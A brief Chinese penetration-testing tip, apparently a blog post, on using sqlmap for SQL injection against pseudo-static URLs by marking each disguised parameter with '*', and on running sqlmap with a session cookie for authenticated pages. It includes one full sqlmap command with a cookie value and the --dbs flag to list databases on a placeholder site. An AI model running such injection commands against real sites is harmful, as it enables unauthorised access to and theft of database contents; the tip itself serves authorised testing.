渗透测试:sqlmap伪静态注入与携带cookie登录认证注入

伪静态注入

伪静态url示例:【http://www.aaaa.com/xxxxx/gorepay-projectID_10-repayPlanID_46-periodNumber_2.html
  1. 伪静态参数:此url中一共伪装了三个参数传递项【projectID_10】、【repayPlanID_46】、【periodNumber_2】
  2. 手工注入点:就在此三个伪静态参数后加注入语句(payload)
  3. sqlmap注入:在每个伪静态参数后加“*”即可

sqlmap针对web登录认证注入

python sqlmap.py -u “http://www.aaaa.com/xxxxx/gorepay-projectID_10-repayPlanID_46-periodNumber_2.html” --cookie=“_fmdata=0E97D79D747B983006FB09DAD60A349E7C023A44A3532E46E3AFB9936C4D45DB80647EFE905132167DAE9081F89D13AA86DADEDF8E69E484;” --dbs

你可能感兴趣的:(渗透测试,sqlmap,penetrationTest)